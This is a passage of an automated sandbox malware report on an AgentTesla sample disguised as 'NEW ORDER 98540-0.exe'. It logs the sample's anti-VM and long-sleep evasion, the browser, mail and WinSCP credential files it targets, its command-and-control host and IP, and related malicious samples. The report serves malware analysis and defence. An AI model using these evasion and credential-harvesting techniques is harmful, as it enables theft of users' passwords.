Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: NEW ORDER 98540-0.exe PID: 6028, type: MEMORYSTR

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Memory allocated: 1370000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Memory allocated: 30F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Memory allocated: 3040000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Memory allocated: 7960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Memory allocated: 76A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Memory allocated: 8A60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Memory allocated: 9A60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Memory allocated: 30D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Memory allocated: 31F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Memory allocated: 51F0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Window / User API: threadDelayed 646			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Window / User API: threadDelayed 3136			Jump to behavior

Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 4596	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 5796	Thread sleep count: 646 > 30	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976	Thread sleep time: -99884s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 5796	Thread sleep count: 3136 > 30	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976	Thread sleep time: -99781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976	Thread sleep time: -99672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976	Thread sleep time: -99563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976	Thread sleep time: -99438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976	Thread sleep time: -99313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976	Thread sleep time: -99188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976	Thread sleep time: -99063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976	Thread sleep time: -98953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976	Thread sleep time: -98812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976	Thread sleep time: -98703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976	Thread sleep time: -98594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976	Thread sleep time: -98469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976	Thread sleep time: -98359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976	Thread sleep time: -98250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976	Thread sleep time: -98141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976	Thread sleep time: -98031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976	Thread sleep time: -97922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Thread delayed: delay time: 99884	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Thread delayed: delay time: 99781	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Thread delayed: delay time: 99672	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Thread delayed: delay time: 99563	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Thread delayed: delay time: 99438	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Thread delayed: delay time: 99313	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Thread delayed: delay time: 99188	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Thread delayed: delay time: 99063	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Thread delayed: delay time: 98953	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Thread delayed: delay time: 98812	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Thread delayed: delay time: 98703	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Thread delayed: delay time: 98594	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Thread delayed: delay time: 98469	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Thread delayed: delay time: 98359	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Thread delayed: delay time: 98250	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Thread delayed: delay time: 98141	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Thread delayed: delay time: 98031	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Thread delayed: delay time: 97922	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: NEW ORDER 98540-0.exe, 00000000.00000002.2109019599.00000000042CE000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER 98540-0.exe, 00000000.00000002.2111404130.0000000007620000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: zXcKLHGFsdLEL
Source: NEW ORDER 98540-0.exe, 00000003.00000002.3339941783.00000000016A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe

Process created: C:\Users\user\Desktop\NEW ORDER 98540-0.exe C:\Users\user\Desktop\NEW ORDER 98540-0.exe

Jump to behavior

Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Queries volume information: C:\Users\user\Desktop\NEW ORDER 98540-0.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Queries volume information: C:\Users\user\Desktop\NEW ORDER 98540-0.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 0.2.NEW ORDER 98540-0.exe.438fb80.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.NEW ORDER 98540-0.exe.4355160.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.NEW ORDER 98540-0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.NEW ORDER 98540-0.exe.4355160.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.NEW ORDER 98540-0.exe.438fb80.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3341066327.000000000323E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3341066327.0000000003246000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3338945387.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3341066327.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2109019599.00000000042CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: NEW ORDER 98540-0.exe PID: 6028, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: NEW ORDER 98540-0.exe PID: 5476, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 0.2.NEW ORDER 98540-0.exe.438fb80.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.NEW ORDER 98540-0.exe.4355160.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.NEW ORDER 98540-0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.NEW ORDER 98540-0.exe.4355160.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.NEW ORDER 98540-0.exe.438fb80.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3338945387.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3341066327.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2109019599.00000000042CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: NEW ORDER 98540-0.exe PID: 6028, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: NEW ORDER 98540-0.exe PID: 5476, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 0.2.NEW ORDER 98540-0.exe.438fb80.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.NEW ORDER 98540-0.exe.4355160.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.NEW ORDER 98540-0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.NEW ORDER 98540-0.exe.4355160.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.NEW ORDER 98540-0.exe.438fb80.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3341066327.000000000323E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3341066327.0000000003246000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3338945387.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3341066327.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2109019599.00000000042CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: NEW ORDER 98540-0.exe PID: 6028, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: NEW ORDER 98540-0.exe PID: 5476, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	11 Process Injection	1 Masquerading	1 OS Credential Dumping	111 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	1 Input Capture	1 Process Discovery	Remote Desktop Protocol	1 Input Capture	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	141 Virtualization/Sandbox Evasion	1 Credentials in Registry	141 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	11 Archive Collected Data	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	1 Data from Local System	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Obfuscated Files or Information	Cached Domain Credentials	24 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
NEW ORDER 98540-0.exe	34%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
NEW ORDER 98540-0.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://mail.elec-qatar.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mail.elec-qatar.com	50.87.139.143	true	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://mail.elec-qatar.com	NEW ORDER 98540-0.exe, 00000003.00000002.3341066327.0000000003246000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://account.dyn.com/	NEW ORDER 98540-0.exe, 00000000.00000002.2109019599.00000000042CE000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER 98540-0.exe, 00000003.00000002.3338945387.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
50.87.139.143	mail.elec-qatar.com	United States		46606	UNIFIEDLAYER-AS-1US	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1408956
Start date and time:	2024-03-14 14:10:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	NEW ORDER 98540-0.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/1@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 69 Number of non-executed functions: 6
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: NEW ORDER 98540-0.exe

Simulations

Behavior and APIs

Time	Type	Description
14:10:56	API Interceptor	20x Sleep call for process: NEW ORDER 98540-0.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
50.87.139.143	Documents of shipment 3-2024.exe	Get hash	malicious	AgentTesla	Browse
	SHIPPING DOC.exe	Get hash	malicious	AgentTesla	Browse
	Order 19A20060.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	Proforma Invoice.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	SHIPPING DOC.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	New order.bat.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	Quotation R2100131410.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	SecuriteInfo.com.Trojan.MSIL.Krypt.2433.31957.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	z92BankingDetails.exe	Get hash	malicious	AgentTesla	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
mail.elec-qatar.com	Documents of shipment 3-2024.exe	Get hash	malicious	AgentTesla	Browse	50.87.139.143
	SHIPPING DOC.exe	Get hash	malicious	AgentTesla	Browse	50.87.139.143
	Order 19A20060.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	50.87.139.143
	Proforma Invoice.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	50.87.139.143
	SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	50.87.139.143
	SHIPPING DOC.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	50.87.139.143
	New order.bat.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	50.87.139.143
	Quotation R2100131410.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	50.87.139.143
	SecuriteInfo.com.Trojan.MSIL.Krypt.2433.31957.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	50.87.139.143
	z92BankingDetails.exe	Get hash	malicious	AgentTesla	Browse	50.87.139.143

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
UNIFIEDLAYER-AS-1US	https://cdn.discordapp.com/attachments/1213770114223046679/1217601726979244064/Purchase.js?ex=66049ef9&is=65f229f9&hm=78f5764b16d6d27e20b2688112ea3defcedad34808d12d6c03f8e77c31bc9736&	Get hash	malicious	AgentTesla	Browse	192.185.103.198
	Delivery note.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	162.240.109.7
	CATALOG LISTs#U180ex#U180el#U180ex#U180e..exe	Get hash	malicious	FormBook	Browse	50.87.223.209
	https://www.vipulcopper.com/	Get hash	malicious	Unknown	Browse	69.49.234.35
	https://prezi.com/i/view/NEzvDMiy71AZ2uVfaGcJ	Get hash	malicious	Unknown	Browse	192.185.198.153
	wsr3iUW0I0.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer	Browse	192.185.16.114
	5059367692.exe	Get hash	malicious	AgentTesla	Browse	50.87.253.239
	https://www.eventcreate.com/e/rfp-reference-recommendatio	Get hash	malicious	Unknown	Browse	50.116.87.174
	https://docusi-recommendations-rfpsecured.us-southeast-1.linodeobjects.com/news.html	Get hash	malicious	Unknown	Browse	50.116.87.174
	https://vdvistoria.com.br/xtt/	Get hash	malicious	HTMLPhisher	Browse	216.172.172.23

Process:	C:\Users\user\Desktop\NEW ORDER 98540-0.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
